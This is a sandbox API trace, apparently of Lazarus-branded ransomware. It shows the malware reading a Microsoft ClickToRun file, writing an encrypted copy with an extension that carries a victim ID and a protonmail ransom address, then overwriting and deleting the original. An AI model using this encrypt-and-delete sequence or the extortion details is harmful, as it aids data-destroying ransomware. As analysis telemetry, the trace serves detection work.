(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.633] AreFileApisANSI () returned 1 [0097.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81918 [0097.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.633] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fa7ec8f, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1162)) returned 1 [0097.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0097.633] AreFileApisANSI () returned 1 [0097.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0097.634] GetLastError () returned 0x0 [0097.634] SetLastError (dwErrCode=0x0) [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0097.634] GetLastError () returned 0x0 [0097.634] SetLastError (dwErrCode=0x0) [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a530 [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0097.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0097.634] AreFileApisANSI () returned 1 [0097.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 147 [0097.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x126) returned 0x5e870 [0097.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=147 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 147 [0097.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.635] GetFileType (hFile=0x368) returned 0x1 [0097.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0097.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0097.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0097.635] AreFileApisANSI () returned 1 [0097.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81358 [0097.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.635] GetFileType (hFile=0x418) returned 0x1 [0097.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.636] GetLastError () returned 0x0 [0097.636] SetLastError (dwErrCode=0x0) [0097.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.636] GetLastError () returned 0x0 [0097.636] SetLastError (dwErrCode=0x0) [0097.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0097.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0097.636] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0097.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0097.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0097.713] GetLastError () returned 0x0 [0097.713] SetLastError (dwErrCode=0x0) [0097.713] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] GetLastError () returned 0x0 [0097.714] SetLastError (dwErrCode=0x0) [0097.714] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x162, lpOverlapped=0x0) returned 1 [0097.810] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0097.810] WriteFile (in: hFile=0x368, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.811] GetLastError () returned 0x0 [0097.811] SetLastError (dwErrCode=0x0) [0097.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cf00 [0097.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0097.811] GetLastError () returned 0x0 [0097.811] SetLastError (dwErrCode=0x0) [0097.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0097.811] WriteFile (in: hFile=0x368, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327ef70*=0x170, lpOverlapped=0x0) returned 1 [0097.811] GetLastError () returned 0x0 [0097.811] SetLastError (dwErrCode=0x0) [0097.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.811] GetLastError () returned 0x0 [0097.812] SetLastError (dwErrCode=0x0) [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0097.812] CloseHandle (hObject=0x368) returned 1 [0097.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0097.813] CloseHandle (hObject=0x418) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.813] AreFileApisANSI () returned 1 [0097.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x816f0 [0097.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x816f0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.814] GetFileType (hFile=0x418) returned 0x1 [0097.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0097.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0097.815] GetLastError () returned 0xb7 [0097.815] SetLastError (dwErrCode=0xb7) [0097.815] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0097.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0097.816] CloseHandle (hObject=0x418) returned 1 [0097.816] AreFileApisANSI () returned 1 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0097.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81ed8 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81ed8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0097.816] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x101458, dwReserved0=0x1, dwReserved1=0x1000000, cFileName="StreamServer.dll", cAlternateFileName="STREAM~1.DLL")) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0097.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.818] AreFileApisANSI () returned 1 [0097.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll", lpUsedDefaultChar=0x0) returned 75 [0097.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0097.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.819] RtlAllocateHeap 